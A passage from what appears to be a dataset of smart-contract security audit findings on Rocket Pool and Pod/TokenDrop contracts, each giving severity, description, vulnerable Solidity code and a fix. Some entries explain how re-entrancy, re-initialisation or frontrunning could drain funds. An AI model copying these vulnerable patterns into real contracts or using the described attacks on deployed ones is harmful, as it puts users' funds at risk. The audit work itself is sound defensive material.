Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n -RocketPoolMinipool - should check for address(0x0)чmediumчThe two implementations for `getContractAddress()` in `Minipool/Delegate` are not checking whether the requested contract's address was ever set before. If it were never set, the method would return `address(0x0)`, which would silently make all delegatecalls succeed without executing any code. In contrast, `RocketBase.getContractAddress()` fails if the requested contract is not known.\\nIt should be noted that this can happen if `rocketMinipoolDelegate` is not set in global storage, or it was cleared afterward, or if `_rocketStorageAddress` points to a contract that implements a non-throwing fallback function (may not even be storage at all).\\nMissing checks\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n\\nChecks implemented\\n```\\nfunction getContractAddress(string memory \\_contractName) internal view returns (address) {\\n // Get the current contract address\\n address contractAddress = getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n // Check it\\n require(contractAddress != address(0x0), \"Contract not found\");\\n // Return\\n return contractAddress;\\n}\\n```\\nчResolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by changing requiring that the contract address is not `0x0`.\\nSimilar to `RocketBase.getContractAddress()` require that the contract is set.чч```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n -RocketDAONodeTrustedAction - ambiguous event emitted in actionChallengeDecideчlowч`actionChallengeDecide` succeeds and emits `challengeSuccess=False` in case the challenged node defeats the challenge. It also emits the same event if another node calls `actionChallengeDecided` before the refute window passed. This ambiguity may make a defeated challenge indistinguishable from a challenge that was attempted to be decided too early (unless the component listening for the event also checks the refute window).\\n```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\nчAvoid ambiguities when emitting events. Consider throwing an exception in the else branch if the refute window has not passed yet (minimal gas savings; it's clear that the call failed; other components can rely on the event only being emitted if there was a decision.чч```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n -RocketDAOProtocolProposals, RocketDAONodeTrustedProposals - unused enum ProposalTypeчlowчThe enum `ProposalType` is defined but never used.\\n```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n\\n```\\nenum ProposalType {\\n Setting // Change a DAO setting (Node operator min/max fees, inflation rate etc)\\n}\\n```\\nчRemove unnecessary code.чч```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n -RocketDaoNodeTrusted - Unused eventsчlowчThe `MemberJoined` `MemberLeave` events are not used within `RocketDaoNodeTrusted`.\\n```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\nчConsider removing the events. Note: `RocketDAONodeTrustedAction` is emitting `ActionJoin` and `ActionLeave` event.sчч```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n -RocketDAOProposal - expired, and defeated proposals can be canceledчlowчThe `RocketDAOProposal.getState` function defaults a proposal's state to `ProposalState.Defeated`. While this fallback can be considered secure, the remaining code does not perform checks that prevent defeated proposals from changing their state. As such, a user can transition a proposal that is `Expired` or `Defeated` to `Cancelled` by using the `RocketDAOProposal.cancel` function. This can be used to deceive users and potentially bias future votes.\\nThe method emits an event that might trigger other components to perform actions.\\n```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n\\n```\\nfunction cancel(address \\_member, uint256 \\_proposalID) override public onlyDAOContract(getDAO(\\_proposalID)) {\\n // Firstly make sure this proposal that hasn't already been executed\\n require(getState(\\_proposalID) != ProposalState.Executed, \"Proposal has already been executed\");\\n // Make sure this proposal hasn't already been successful\\n require(getState(\\_proposalID) != ProposalState.Succeeded, \"Proposal has already succeeded\");\\n // Only allow the proposer to cancel\\n require(getProposer(\\_proposalID) == \\_member, \"Proposal can only be cancelled by the proposer\");\\n // Set as cancelled now\\n setBool(keccak256(abi.encodePacked(daoProposalNameSpace, \"cancelled\", \\_proposalID)), true);\\n // Log it\\n emit ProposalCancelled(\\_proposalID, \\_member, block.timestamp);\\n}\\n```\\nчPreserve the true outcome. Do not allow to cancel proposals that are already in an end-state like `canceled`, `expired`, `defeated`.чч```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n -RocketDAOProposal - preserve the proposals correct state after expirationчlowчThe state of proposals is resolved to give a preference to a proposal being `expired` over the actual result which may be `defeated`. The preference for a proposal's status is checked in order: `cancelled? -> executed? -> `expired`? -> succeeded? -> pending? -> active? -> `defeated` (default)`\\n```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\nчconsider checking for `voteAgainst` explicitly and return `defeated` instead of `expired` if a proposal was `defeated` and is queried after expiration. Preserve the actual proposal result.чч```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n -RocketRewardsPool - registerClaimer should check if a node is already disabled before decrementing rewards.pool.claim.interval.claimers.total.nextчlowчThe other branch in `registerClaimer` does not check whether the provided `_claimerAddress` is already disabled (or invalid). This might lead to inconsistencies where `rewards.pool.claim.interval.claimers.total.next` is decremented because the caller provided an already deactivated address.\\nThis issue is flagged as `minor` since we have not found an exploitable version of this issue in the current codebase. However, we recommend safeguarding the implementation instead of relying on the caller to provide sane parameters. Registered Nodes cannot unregister, and Trusted Nodes are unregistered when they leave.\\n```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, \"Claimer is already registered\");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.contract.registered.block\", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\nчEnsure that `getClaimingContractUserRegisteredBlock(contractName, _claimerAddress)` returns `!=0` before decrementing the `.total.next`.чч```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, \"Claimer is already registered\");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.contract.registered.block\", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n -RocketNetworkPrices - Price feed update lacks block number sanity checkчlowчTrusted nodes submit the RPL price feed. The function is called specifying a block number and the corresponding RPL price for that block. If a DAO vote goes through for that block-price combination, it is written to storage. In the unlikely scenario that a vote confirms a very high block number such as `uint(-1)`, all future price updates will fail due to the `require` check below.\\nThis issue becomes less likely the more active members the DAO has. Thus, it's considered a minor issue that mainly affects the initial bootstrapping process.\\n```\\n// Check block\\nrequire(\\_block > getPricesBlock(), \"Network prices for an equal or higher block are set\");\\n```\\nчThe function's `_block` parameter should be checked to prevent large block numbers from being submitted. This check could, e.g., specify that node operators are only allowed to submit price updates for a maximum of x blocks ahead of `block.number`.чч```\\n// Check block\\nrequire(\\_block > getPricesBlock(), \"Network prices for an equal or higher block are set\");\\n```\\n -RocketDepositPool - Potential gasDoS in assignDeposits Acknowledgedчlowч`assignDeposits` seems to be a gas heavy function, with many external calls in general, and few of them are inside the for loop itself. By default, `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` returns `2`, which is not a security concern. Through a DAO vote, the settings key `deposit.assign.maximum` can be set to a value that exhausts the block gas limit and effectively deactivates the deposit assignment process.\\n```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\nчThe `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` return value could be cached outside the loop. Additionally, a check should be added that prevents unreasonably high values.чч```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n -RocketNetworkWithdrawal - ETH dust lockup due to rounding errorsчlowчThere's a potential `ETH` dust lockup when processing a withdrawal due to rounding errors when performing a division.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\nчCalculate `userAmount` as `msg.value - nodeAmount` instead. This should also save some gas.чч```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n -RocketAuctionManager - calcBase should be declared constantчlowчDeclaring the same constant value `calcBase` multiple times as local variables to some methods in `RocketAuctionManager` carries the risk that if that value is ever updated, one of the value assignments might be missed. It is therefore highly recommended to reduce duplicate code and declare the value as a public constant. This way, it is clear that the same `calcBase` is used throughout the contract, and there is a single point of change in case it ever needs to be changed.\\n```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n\\n```\\nfunction getLotClaimedRPLAmount(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotCurrentPrice(\\_index));\\n}\\n```\\n\\n```\\n// Calculation base value\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\nuint256 bidAmount = msg.value;\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\n// Calculate RPL claim amount\\nuint256 calcBase = 1 ether;\\nuint256 rplAmount = calcBase.mul(bidAmount).div(currentPrice);\\n```\\nчConsider declaring `calcBase` as a private const state var instead of re-declaring it with the same value in multiple, multiple functions. Constant, literal state vars are replaced in a preprocessing step and do not require significant additional gas when accessed than normal state vars.чч```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n -RocketDAO* - daoNamespace is missing a trailing dot; should be declared constant/immutableчlowч`string private daoNameSpace = 'dao.trustednodes'` is missing a trailing dot, or else there's no separator when concatenating the namespace with the vars.\\nrequests `dao.trustednodesmember.index` instead of `dao.trustednodes.member.index`\\n```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, \"member.index\")), \\_index);\\n}\\n```\\n\\n```\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// Calculate using this as the base\\nuint256 private calcBase = 1 ether;\\n\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// The namespace for any data stored in the network DAO (do not change)\\nstring private daoNameSpace = 'dao.protocol';\\n```\\nчRemove the `daoNameSpace` and add the prefix to the respective variables directly.чч```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, \"member.index\")), \\_index);\\n}\\n```\\n -RocketVault - consider rejecting zero amount deposit/withdrawal requestsчlowчConsider disallowing zero amount token transfers unless the system requires this to work. In most cases, zero amount token transfers will emit an event (that potentially triggers off-chain components). In some cases, they allow the caller without holding any balance to call back to themselves (pot. reentrancy) or the caller provided token address.\\n`depositEther` allows to deposit zero ETH\\nemits `EtherDeposited`\\n`withdrawEther` allows to withdraw zero ETH\\ncalls back to `withdrawer` (msg.sender)!\\nemits `EtherWithdrawn`\\n(depositToken checks for amount >0)\\n`withdrawToken` allows zero amount token withdrawals\\ncalls into user provided (actually a network contract) tokenAddress)\\nemits `TokenWithdrawn`\\n`transferToken` allows zero amount token transfers\\nemits `TokenTransfer`\\n```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\nчZero amount transfers are no-operation calls in most cases and should be avoided. However, as all vault actions are authenticated (to registered system contracts), the risk of something going wrong is rather low. Nevertheless, it is recommended to deny zero amount transfers to avoid running code unnecessarily (gas consumption), emitting unnecessary events, or potentially call back to callers/token address for ineffective transfers.чч```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n -RocketVault - methods returning static return values and unchecked return parametersчlowчThe `Token*` methods in `RocketVault` either throw or return `true`, but they can never return `false`. If the method fails, it will always throw. Therefore, it is questionable if the static return value is needed at all. Furthermore, callees are in most cases not checking the return value of\\nstatic return value `true`\\n```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\nemit TokenWithdrawn(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\n// Emit token withdrawn event\\nemit TokenTransfer(contractKeyFrom, contractKeyTo, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\nreturn value not checked\\n```\\nrocketVault.depositToken(\"rocketNodeStaking\", rplTokenAddress, \\_amount);\\n// Update RPL stake amounts & node RPL staked block\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(\"rocketTokenRPL\"), rplAmount);\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(\"rocketTokenRPL\"), \\_amount);\\n```\\n\\n```\\nrocketVault.transferToken(\"rocketAuctionManager\", getContractAddress(\"rocketTokenRPL\"), rplSlashAmount);\\n```\\nчDefine a clear interface for these functions. Remove the static return value in favor of having the method throw on failure (which is already the current behavior).чч```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n -RocketMinipoolDelegate - enforce that the delegate contract cannot be called directlyчlowчThis contract is not meant to be consumed directly and will only be delegate called from `Minipool`. Being able to call it directly might even create the problem that, in the worst case, someone might be able to `selfdestruct` the contract rendering all other contracts that link to it dysfunctional. This might even not be easily detectable because `delegatecall` to an EOA will act as a NOP.\\nThe access control checks on the methods currently prevent methods from being called directly on the delegate. They require state variables to be set correctly, or the delegate is registered as a valid minipool in the system. Both conditions are improbable to be fulfilled, hence, mitigation any security risk. However, it looks like this is more of a side-effect than a design decision, and we would recommend not explicitly stating that the delegate contract cannot be used directly.\\n```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), \"Invalid storage address\");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\nчResolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by removing the constructor and therefore the initialization code from the RocketMinipoolDelegate contract. The contract cannot be used directly anymore as all relevant methods are decorated `onlyInitialised` and there is no way to initialize it in the implementation directly.\\nRemove the initialization from the constructor in the delegate contract. Consider adding a flag that indicates that the delegate contract is initialized and only set in the Minipool contract and not in the logic contract (delegate). On calls, check that the contract is initialized.чч```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), \"Invalid storage address\");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n -Re-entrancy issue for ERC1155чhighчERC1155 tokens have callback functions on some of the transfers, like `safeTransferFrom`, `safeBatchTransferFrom`. During these transfers, the `IERC1155ReceiverUpgradeable(to).onERC1155Received` function is called in the `to` address.\\nFor example, `safeTransferFrom` is used in the `LiquidityMining` contract:\\n```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n \"2 weeks after liquidity mining time has not expired\");\\n require(!isNFTDistributed, \"NFT is already distributed\");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, \"\");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n\\nDuring that transfer, the `distributeAllNFT` function can be called again and again. So multiple transfers will be done for each user.\\nIn addition to that, any receiver of the tokens can revert the transfer. If that happens, nobody will be able to receive their tokens.чAdd a reentrancy guard.\\nAvoid transferring tokens for different receivers in a single transaction.чч```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n \"2 weeks after liquidity mining time has not expired\");\\n require(!isNFTDistributed, \"NFT is already distributed\");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, \"\");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n -Winning pods can be frontrun with large depositsчhighч`Pod.depositTo()` grants users shares of the pod pool in exchange for `tokenAmount` of `token`.\\n```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, \"Pod:invalid-amount\");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n\\nThe winner of a prize pool is typically determined by an off-chain random number generator, which requires a request to first be made on-chain. The result of this RNG request can be seen in the mempool and frontrun. In this case, an attacker could identify a winning `Pod` contract and make a large deposit, diluting existing user shares and claiming the entire prize.чThe modifier `pauseDepositsDuringAwarding` is included in the `Pod` contract but is unused.\\n```\\nmodifier pauseDepositsDuringAwarding() {\\n require(\\n !IPrizeStrategyMinimal(\\_prizePool.prizeStrategy()).isRngRequested(),\\n \"Cannot deposit while prize is being awarded\"\\n );\\n \\_;\\n}\\n```\\n\\nAdd this modifier to the `depositTo()` function along with corresponding test cases.чч```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, \"Pod:invalid-amount\");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n -TokenDrop: Unprotected initialize() functionчhighчThe `TokenDrop.initialize()` function is unprotected and can be called multiple times.\\n```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n\\nAmong other attacks, this would allow an attacker to re-initialize any `TokenDrop` with the same `asset` and a malicious `measure` token. By manipulating the balance of a user in this malicious `measure` token, the entire `asset` token balance of the `TokenDrop` contract could be drained.чAdd the `initializer` modifier to the `initialize()` function and include an explicit test that every initialization function in the system can be called once and only once.чч```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n -Pod: Re-entrancy during deposit or withdrawal can lead to stealing fundsчhighчDuring the deposit, the token transfer is made after the Pod shares are minted:\\n```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n\\nThat means that if the `token` allows re-entrancy, the attacker can deposit one more time inside the `token` transfer. If that happens, the second call will mint more tokens than it is supposed to, because the first `token` transfer will still not be finished. By doing so with big amounts, it's possible to drain the pod.чAdd re-entrancy guard to the external functions.чч```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n -TokenDrop: Re-entrancy in the claim function can cause to draining fundsчhighчIf the `asset` token is making a call before the `transfer` to the `receiver` or to any other 3-d party contract (like it's happening in the `Pod` token using the `_beforeTokenTransfer` function), the attacker can call the `drop` function inside the `transfer` call here:\\n```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n\\nBecause the `totalUnclaimed` is already changed, but the current balance is not, the `drop` function will consider the funds from the unfinished transfer as the new tokens. These tokens will be virtually redistributed to everyone.\\nAfter that, the transfer will still happen, and further calls of the `drop()` function will fail because the following line will revert:\\n`uint256 newTokens = assetTotalSupply.sub(totalUnclaimed);`\\nThat also means that any transfers of the `Pod` token will fail because they all are calling the `drop` function. The `TokenDrop` will “unfreeze” only if someone transfers enough tokens to the `TokenDrop` contract.\\nThe severity of this issue is hard to evaluate because, at the moment, there's not a lot of tokens that allow this kind of re-entrancy.чSimply adding re-entrancy guard to the `drop` and the `claim` function won't help because the `drop` function is called from the `claim`. For that, the transfer can be moved to a separate function, and this function can have the re-entrancy guard as well as the `drop` function.\\nAlso, it's better to make sure that `_beforeTokenTransfer` will not revert to prevent the token from being frozen.чч```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return 